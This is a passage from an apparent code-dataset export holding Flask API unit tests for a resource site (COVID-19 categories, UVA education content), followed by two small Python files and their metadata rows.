self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 1)
rv = self.app.get('api/resource/covid19/Visual_Aids', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 1)
rv = self.app.get('api/resource/covid19/Health_and_Telehealth', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 1)
def test_is_uva_education_content(self):
self.construct_resource(is_draft=True, title='Autism at UVA', is_uva_education_content=True)
self.construct_resource(is_draft=False, title='Healthy Eating', is_uva_education_content=True)
self.construct_resource(is_draft=True, title='Autism and the Arts', is_uva_education_content=False)
self.construct_resource(is_draft=False, title='Autism One', is_uva_education_content=True)
self.construct_resource(is_draft=False, title='Two', is_uva_education_content=False)
rv = self.app.get('api/resource/education', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 2)
rv = self.app.get('api/resource', content_type="application/json")
self.assert_success(rv)
response = json.loads(rv.get_data(as_text=True))
self.assertEqual(len(response), 5)
| 47.274096 | 135 | 0.649761 | 2,008 | 15,695 | 4.885956 | 0.083665 | 0.024462 | 0.035776 | 0.100703 | 0.833554 | 0.790847 | 0.774335 | 0.741617 | 0.720925 | 0.69789 | 0 | 0.007947 | 0.214272 | 15,695 | 331 | 136 | 47.416918 | 0.787626 | 0 | 0 | 0.595156 | 0 | 0 | 0.181395 | 0.041733 | 0 | 0 | 0 | 0 | 0.294118 | 1 | 0.058824 | false | 0 | 0.027682 | 0 | 0.089965 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
0768ed6923c47dbe150e783f6cd01fa2f7c9e54c
| 41 |
py
|
Python
|
EduData/Task/__init__.py
|
BAOOOOOM/EduData
|
affa465779cb94db00ed19291f8411229d342c0f
|
[
"Apache-2.0"
] | 98 |
2019-07-05T03:27:36.000Z
|
2022-03-30T08:38:09.000Z
|
EduData/Task/__init__.py
|
BAOOOOOM/EduData
|
affa465779cb94db00ed19291f8411229d342c0f
|
[
"Apache-2.0"
] | 45 |
2020-12-25T03:49:43.000Z
|
2021-11-26T09:45:42.000Z
|
EduData/Task/__init__.py
|
BAOOOOOM/EduData
|
affa465779cb94db00ed19291f8411229d342c0f
|
[
"Apache-2.0"
] | 50 |
2019-08-17T05:11:15.000Z
|
2022-03-29T07:54:13.000Z
|
# coding: utf-8
# 2019/8/23 @ tongshiwei
| 13.666667 | 24 | 0.658537 | 7 | 41 | 3.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.235294 | 0.170732 | 41 | 2 | 25 | 20.5 | 0.558824 | 0.878049 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
4aeb5cb919a70c0ac2be053ebf69b329fe3c2ae2
| 109 |
py
|
Python
|
tests/test_advanced.py
|
dhaitz/python-package-template
|
b4c636e48ae192e5efe30fe71af37be6f8273d29
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_advanced.py
|
dhaitz/python-package-template
|
b4c636e48ae192e5efe30fe71af37be6f8273d29
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_advanced.py
|
dhaitz/python-package-template
|
b4c636e48ae192e5efe30fe71af37be6f8273d29
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from .context import sample
def test_thoughts():
assert(sample.hmm() is None)
| 13.625 | 32 | 0.642202 | 15 | 109 | 4.6 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.192661 | 109 | 7 | 33 | 15.571429 | 0.772727 | 0.192661 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.